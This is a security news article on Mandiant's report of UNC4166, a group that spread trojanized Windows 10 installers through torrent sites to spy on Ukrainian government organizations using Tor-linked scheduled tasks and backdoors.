Software supply chain attacks are not slowing down, and researchers have uncovered a new example that targeted victims in Ukraine with malicious Windows installer files that were designed to gather and exfiltrate sensitive data from compromised machines.
The campaign involved the threat actors hosting the malicious files on torrent sites hosted in Russia and Ukraine. The files were disguised as legitimate installers for Windows 10 and researchers at Mandiant discovered the operation and attributed it to a new, unknown group it tracks as UNC4166. Though the actors are not known, Mandiant said some of the victim organizations overlapped with ones that APT28 has targeted previously with destructive malware attacks. APT28, also known as Fancy Bear, is associated with Russia’s GRU military intelligence unit.
The operation appears to have been focused solely on information gathering, with no financial motivation, Mandiant said. In some of the compromised organizations, the UNC4166 actors installed backdoors to maintain persistence.
“The trojanized ISOs were hosted on Ukrainian and Russian language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors,” a Mandiant post on the operation says.
Software supply chain attacks have become a tool of choice for some top-tier threat groups, especially those in the intelligence community. Compromising one piece of software or library and having the results filter down through the supply chain can pay dividends for months or years to come. Mandiant said this specific operation began several months ago and one of the ISO files used in it was designed to disable security telemetry and also block automatic updates.
“The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022,” Mandiant said.
“Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY.”
The researchers said that the operation was probably designed to gather information from Ukrainian government agencies.
“Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server,” Mandiant said.
“We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest.”
In some cases, compromised devices had more than one backdoor on them, and the threat actors also tried to download and install the Tor browser on some machines.